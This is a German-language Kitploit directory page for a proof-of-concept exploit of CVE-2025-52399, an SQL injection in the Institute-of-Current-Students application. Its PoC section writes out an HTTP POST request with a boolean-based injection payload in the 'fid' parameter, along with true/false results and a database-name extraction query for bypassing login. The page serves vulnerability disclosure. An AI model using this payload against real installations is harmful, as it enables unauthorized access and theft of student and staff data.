Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-52399-SQLi-Institute-of-Current-Students — Proof-of-Concept-Exploit für CVE-2025-52399, der eine SQL-Injection in der Institute-of-Current-Students-Anwendung über den Endpunkt loginlinkfaculty zur Umgehung der Authentifizierung und Datenextraktion demonstriert. | Kitploit
Tools/GitHubGitHub/gmh5225/cve-2025-52399-sqli-institute-of-current-students
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsLernen & Bildung
GitHubgmh5225/cve-2025-52399-sqli-institute-of-current-students

CVE-2025-52399-SQLi-Institute-of-Current-Students

Proof-of-Concept-Exploit für CVE-2025-52399, der eine SQL-Injection in der Institute-of-Current-Students-Anwendung über den Endpunkt loginlinkfaculty zur Umgehung der Authentifizierung und Datenextraktion demonstriert.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 1 JahrNoch nicht geprüft

CVE-2025-52399 - SQL-Injection im Institute of Current Students

Zusammenfassung

Der loginlinkfaculty-Endpunkt in der Anwendung Institute-of-Current-Students ist anfällig für SQL-Injection über den POST-Parameter fid. Der Parameter wird nicht ordnungsgemäß bereinigt, bevor er in einer SQL-Abfrage verwendet wird, sodass entfernte Angreifer beliebige SQL-Befehle ausführen können.

  • Schwachstellentyp: SQL-Injection
  • Betroffene Komponente: /loginlinkfaculty (POST)
  • Betroffener Parameter: fid
  • Authentifizierung: Nicht erforderlich
  • Auswirkung: Authentifizierungsumgehung, Datenextraktion
  • Getestet auf: Localhost
  • Datenbank: icsnew
  • Version: 1.0

PoC

HTTP-Anfrage

root@kitploit:~
POST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

fid=-1'+OR+3*2*1=6+AND+000942=000942--&pass=example

Payload-Ergebnis

✅ -1' OR 3*2*1=6 AND 000942=000942 -- → TRUE ❌ -1' OR 2*3=4 AND 000942=000942 -- → FALSE

Datenbank-Extraktion

root@kitploit:~
SELECT database(); -- returns 'icsnew'

Referenzen

  • CVE-2025-52399 (MITRE)
  • Verwundbare Anwendung
  • OWASP SQL-Injection

Entdecker

Isroil Mustafoqulov

Tool herunterladen